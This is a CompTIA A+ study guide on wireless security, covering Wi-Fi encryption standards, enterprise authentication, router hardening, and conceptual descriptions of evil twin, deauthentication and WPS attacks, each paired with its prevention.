Wireless Security for CompTIA A+ 220-1102

WEP (Wired Equivalent Privacy): original Wi-Fi security standard, introduced 1997. Uses RC4 cipher with 40-bit or 104-bit key. Broken — crackers can recover WEP key in minutes from captured traffic. Never use WEP. WPA (Wi-Fi Protected Access): replaced WEP. Uses TKIP (Temporal Key Integrity Protocol) — per-packet key mixing. Also broken — do not use. WPA2: uses AES-CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol). Much stronger than WEP/WPA. Two modes: Personal (WPA2-PSK — pre-shared key, home/small business), Enterprise (802.1X — individual authentication per user, corporate). WPA3: current standard. Personal uses SAE (Simultaneous Authentication of Equals) — resistant to offline dictionary attacks even if the password is simple. Enterprise uses 192-bit security suite. Supports PMF (Protected Management Frames) — prevents deauthentication attacks. WPA3 also includes Easy Connect (QR-code-based device onboarding) and Enhanced Open (encryption even on open networks).

WPA2/WPA3 Personal (PSK): single shared password for all devices. Easy to set up but compromised password affects all devices. WPA2/WPA3 Enterprise (802.1X): each user authenticates individually using RADIUS server. Credentials: username/password, certificates, or smart cards. RADIUS (Remote Authentication Dial-In User Service): centralized authentication server for network access. EAP (Extensible Authentication Protocol): framework for authentication over network access. EAP variants: EAP-TLS (certificate-based, most secure), PEAP (Protected EAP — wraps EAP in TLS tunnel, commonly uses MSCHAPv2 for credentials), EAP-TTLS (similar to PEAP). 802.1X port authentication: network access controlled at the switch/AP level — unauthenticated devices cannot join the network even if connected. Captive portal: web-based authentication page for guest networks.

Change default SSID and admin credentials on the wireless router/AP — default credentials are publicly known and easily exploited. Use WPA3 if supported; WPA2-AES as minimum — disable WEP and WPA/TKIP entirely. Enable MAC address filtering: only allow known device MAC addresses — not a strong control (MAC addresses can be spoofed) but adds a layer. Disable SSID broadcast (hidden network): SSID is still discoverable with passive scanning tools — security through obscurity, not real security, but reduces casual detection. Enable firewall on the router: blocks inbound connections from the internet. Disable WPS (Wi-Fi Protected Setup): PIN method is vulnerable to brute force (WPS PIN attack). Enable firewall on individual computers too. Use a separate guest network for visitors: isolated from the corporate/home network. Regularly update router/AP firmware. Position access points to minimize signal outside the building (RF leakage).

Evil twin attack: attacker sets up a rogue AP with the same SSID as a legitimate network. Users connect without realizing they're on the attacker's network — MitM attack. Prevention: 802.1X enterprise authentication (user certificates prevent evil twin from completing auth). WPA3 SAE: each device proves knowledge of the password without transmitting it — evil twin cannot capture the handshake for offline cracking. Deauthentication attack: attacker sends forged 802.11 deauth frames to disconnect clients from the legitimate AP. Clients automatically reconnect — attacker captures the 4-way handshake for offline dictionary attack on WPA2. Prevention: WPA3 PMF (Protected Management Frames). WPS PIN brute force: WPS PIN authentication splits the 8-digit PIN into two halves — can be cracked in hours. Prevention: disable WPS. Wardriving: driving through an area scanning for Wi-Fi networks — used to find unsecured or weakly secured networks.

Public Wi-Fi risks: traffic visible to others on the same network, evil twin attacks, captive portal credential capture. Mitigation when using public Wi-Fi: VPN: encrypts all traffic between device and VPN server — protects from other users on the network and the AP operator. Only use HTTPS websites (verify TLS certificate). Disable file and printer sharing: off for Public profile in Windows network settings. Turn off auto-connect to known networks: prevents auto-joining rogue networks with matching SSIDs. Use cellular data for sensitive operations when possible. Mobile hotspot: create your own private Wi-Fi from a cellular connection — more secure than public Wi-Fi. WPA3 Enhanced Open: even open (no password) networks encrypt traffic between client and AP (but AP still sees all traffic).